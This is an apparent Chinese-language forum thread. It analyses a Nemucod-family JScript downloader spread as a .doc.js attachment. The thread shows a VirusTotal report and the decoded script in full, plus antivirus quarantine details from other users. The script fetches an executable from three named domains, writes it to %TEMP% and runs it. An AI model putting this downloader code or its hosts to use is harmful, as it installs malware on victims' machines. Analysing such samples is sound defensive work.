task-000685179.doc.js

轩夏

SHA256:         47319c6a2724e24d0d26d207a236e3a1390e04dbeac2bff389bc3f43ef27fa9e
文件名：        task-000685179.doc.js
检出率：         13 / 55
分析日期：         2016-01-12 04:20:13 UTC ( 4 小时, 13 分钟 前 )

https://www.virustotal.com/zh-cn ... 3ef27fa9e/analysis/

反病毒软件         结果         病毒库日期
AVG         JS/Downloader.Agent         20160112
AVware         Trojan-Downloader.JS.Nemucod.b (v)         20160111
Cyren         JS/Nemucod.D.gen         20160112
DrWeb         SCRIPT.Virus         20160112
F-Prot         JS/Nemucod.D.gen         20160111
Fortinet         JS/Kryptik.DTTU!tr         20160111
Kaspersky         HEUR:Exploit.Script.Generic         20160112
McAfee         JS/Nemucod.aw         20160112
McAfee-GW-Edition         BehavesLike.JS.Exploit.xv         20160112
Microsoft         TrojanDownloader:JS/Swabfex.A         20160112
NANO-Antivirus         Riskware.Script.Nemucod.dypbwr         20160112
Sophos         Troj/JSAgent-GM         20160112
VIPRE         Trojan-Downloader.JS.Nemucod.b (v)         20160112



对代码进行解密
var a5='555C545E060516161D24171110074A070B095E3C5E14160B001117011611160508014A160B5E17515E5550515651525256505D5E55'
var b = "tewksburytennis.org ghohio.com hya.mx".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "870416";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
    for (var i = ld; i < b.length; i++) {
        var dn = 0;
        try {
            xo.open("GET", "http://" + b + "/counter/?id=" + a5 + "&rnd=17767" + n, false);
            xo.send();
            if (xo.status == 200) {
                xa.open();
                xa.type = 1;
                xa.write(xo.responseBody);
                if (xa.size > 1000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn + n + ".exe", 2);
                    try {
                        ws.Run(fn + n + ".exe", 1, 0);
                    } catch(er) {};
                };
                xa.close();
            };
            if (dn == 1) {
                ld = i;
                break;
            };
        } catch(er) {};
    };
};

下载运行的exe



https://www.virustotal.com/zh-cn ... 6134184fb/analysis/
https://www.virustotal.com/zh-cn ... ed6619d6c/analysis/
https://www.virustotal.com/zh-cn ... 84c069dd0/analysis/

欧阳宣

那个exe

Gen:Variant.Zusy.175697

liu浪的人

xyz0703

文件名: 45524e1ff.gif
威胁名称: Downloader完整路径: c:\users\xyz\desktop\45524e1ff.gif

____________________________

____________________________


在电脑上的创建时间 
2016/1/12 星期二 ( 17:06:21 )

上次使用时间 
2016/1/12 星期二 ( 17:06:21 )

启动项目 
否

已启动 
否

威胁类型: 病毒。 将自身插入或附加到其他程序、文件或电脑区域以感染这些媒介的程序。

____________________________


45524e1ff.gif 威胁名称: Downloader
定位


极少用户信任的文件
诺顿社区中有 不到 5 名用户使用了此文件。

极新的文件
该文件已在 不到 1 周 前发行。

高
此文件具有高风险。


____________________________


来源: 外部介质


____________________________

文件操作

文件: c:\users\xyz\desktop\ 45524e1ff.gif 已阻止
____________________________


文件指纹 - SHA:
不可用
文件指纹 - MD5:
不可用

275751198

EXE是360 QVM07